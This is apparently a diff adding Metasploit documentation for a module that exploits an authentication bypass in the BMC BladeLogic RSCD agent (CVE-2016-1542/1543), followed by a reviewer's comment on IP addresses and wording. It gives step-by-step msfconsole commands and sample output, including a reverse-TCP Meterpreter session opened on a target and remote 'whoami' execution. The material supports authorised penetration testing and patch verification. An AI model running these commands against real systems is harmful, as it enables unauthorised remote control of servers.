| 1 | +## Description |
| 2 | +This module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication. |
| 3 | + |
| 4 | +Affected versions of the BMC RSCD agent fail to enforce authentication controls at the server side enabling a rogue client to send an authentication message, ignore the response, and continue interacting with the agent as though the authentication was successful. This module takes advantage of this vulnerability to execute arbitrary operating system commands using the BMC network shell (NSH) functionality. |
| 5 | + |
| 6 | +The access control vulnerability itself was identified by Olga Yanushkevich of [ERNW](https://www.ernw.de/) and was assigned [CVE-2016-1542](https://www.cvedetails.com/cve/CVE-2016-1542/) and [CVE-2016-1543](https://www.cvedetails.com/cve/CVE-2016-1543/). Further details can be found at the [ERNW Insinuator website](https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/). |
| 7 | + |
| 8 | +Technical details of the RCE exploit can be found [here](https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/) and [here](https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/). |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | +The module affects the RSCD agent component of [BMC BladeLogic Server Automation](http://www.bmcsoftware.uk/it-solutions/bladelogic-server-automation.html). The agent is installed on servers managed using BMC BladeLogic Server Automation and listens on TCP port 4750. The vulnerability affects versions 8.x below 8.6 SP1 Patch 2, 8.7 Patch 3, and 8.8. More details on affected versions and the fix can be found from the [BMC Knowledgebase](https://selfservice.bmc.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA214000000dBpnCAE&type=Solution). |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | +To use this exploit you will need access to BMC BladeLogic Server Automation. |
| 15 | + |
| 16 | +1. Install the RSCD agent on a host as detailed in the [BMC documentation](https://docs.bmc.com/docs/ServerAutomation/89/agent-installation-overview-653394992.html). |
| 17 | +2. Ensure that the RSCD service is running and listening on TCP port 4750. |
| 18 | +3. Launch `msfconsole`. |
| 19 | +4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`. |
| 20 | +5. Select the generic command target `set target 3`. |
| 21 | +6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`. |
| 22 | +7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`. |
| 23 | +8. Run the exploit `exploit`. |
| 24 | + |
| 25 | +The result should be that the string `MSF` is returned and output. |
| 26 | + |
| 27 | +## Usage Scenarios |
| 28 | +The exploit module contains several targets as detailed below. |
| 29 | + |
| 30 | +### Target 0: Automatic |
| 31 | +The automatic target causes the module to issue an `agentinfo` request to the target in an attempt to identify the target operating system. If it appears to be a Windows target then the module behaves as though target 1 was selected, otherwise it behaves as though target 2 was selected. |
| 32 | + |
| 33 | +### Target 1: Windows/VBS Stager |
| 34 | +This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). |
| 35 | + |
| 36 | + msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce |
| 37 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84 |
| 38 | + RHOST => 34.239.181.84 |
| 39 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set LHOST 54.164.112.135 |
| 40 | + LHOST => 54.164.112.135 |
| 41 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 1 |
| 42 | + TARGET => 1 |
| 43 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD windows/meterpreter/reverse_tcp |
| 44 | + PAYLOAD => windows/meterpreter/reverse_tcp |
| 45 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit |
| 46 | + [*] Exploit running as background job 1. |
| 47 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > |
| 48 | + [*] Started reverse TCP handler on 0.0.0.0:4444 |
| 49 | + [*] 34.239.181.84:4750 - Command Stager progress - 8.01% done (8099/101056 bytes) |
| 50 | + [*] 34.239.181.84:4750 - Command Stager progress - 16.03% done (16198/101056 bytes) |
| 51 | + [*] 34.239.181.84:4750 - Command Stager progress - 24.04% done (24297/101056 bytes) |
| 52 | + [*] 34.239.181.84:4750 - Command Stager progress - 32.06% done (32396/101056 bytes) |
| 53 | + [*] 34.239.181.84:4750 - Command Stager progress - 40.07% done (40495/101056 bytes) |
| 54 | + [*] 34.239.181.84:4750 - Command Stager progress - 48.09% done (48594/101056 bytes) |
| 55 | + [*] 34.239.181.84:4750 - Command Stager progress - 56.10% done (56693/101056 bytes) |
| 56 | + [*] 34.239.181.84:4750 - Command Stager progress - 64.11% done (64792/101056 bytes) |
| 57 | + [*] 34.239.181.84:4750 - Command Stager progress - 72.13% done (72891/101056 bytes) |
| 58 | + [*] 34.239.181.84:4750 - Command Stager progress - 80.14% done (80990/101056 bytes) |
| 59 | + [*] 34.239.181.84:4750 - Command Stager progress - 88.16% done (89089/101056 bytes) |
| 60 | + [*] 34.239.181.84:4750 - Command Stager progress - 96.17% done (97188/101056 bytes) |
| 61 | + [*] 34.239.181.84:4750 - Command Stager progress - 100.00% done (101056/101056 bytes) |
| 62 | + [*] Sending stage (179779 bytes) to 34.239.181.84 |
| 63 | + [*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000 |
| 64 | + |
| 65 | +### Target 2: Unix/Linux |
| 66 | +This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1. |
| 67 | + |
| 68 | +### Target 3: Generic Cmd |
| 69 | +This target can be used with *cmd* payloads to execute operating system commands against the target host. |
| 70 | + |
| 71 | + msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce |
| 72 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84 |
| 73 | + RHOST => 34.239.181.84 |
| 74 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 3 |
| 75 | + TARGET => 3 |
| 76 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD cmd/windows/generic |
| 77 | + PAYLOAD => cmd/windows/generic |
| 78 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set CMD "cmd /c whoami" |
| 79 | + CMD => cmd /c whoami |
| 80 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit |
| 81 | + [*] Exploit running as background job 2. |
| 82 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > |
| 83 | + [+] 34.239.181.84:4750 - Output |
| 84 | + ip-ac1f1eb2\bladelogicrscd |
| 85 | + |
| 86 | +#### Windows Hosts |
| 87 | +When using this module target against Windows hosts, non-powershell command lines are limited to around 8,100 characters and generally have to be prefixed with `cmd /c`. |
| 88 | +Powershell commands are executed differently and have a much larger length limit of around 32,700 characters. |
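Review bot: the sample console sessions under Target 1 (lines 37-63) and Target 3 (lines 72-84) use what look like live public addresses (`34.239.181.84`, `54.164.112.135`, `172.31.58.107`); module documentation should use RFC 5737 documentation ranges (for example `192.0.2.10` for RHOST and `192.0.2.20` for LHOST) so readers copying the example do not point a handler or an exploit at a real host. A few wording fixes in the same hunk: line 11 says "The module affects the RSCD agent component", but it is the vulnerability that affects the agent, so "The vulnerability affects the RSCD agent component of ..." reads correctly, and "can be found from the BMC Knowledgebase" should be "can be found in the BMC Knowledgebase"; line 8's two bare "here" links should carry descriptive text (the titles of the two write-ups) so the references survive outside a rendered page; line 25 "is returned and output" could simply say "is returned in the module output"; and lines 88-89 should spell the product name "PowerShell" and state how the module decides a command line is a PowerShell command, since the two length limits (around 8,100 versus around 32,700 characters) depend on that distinction.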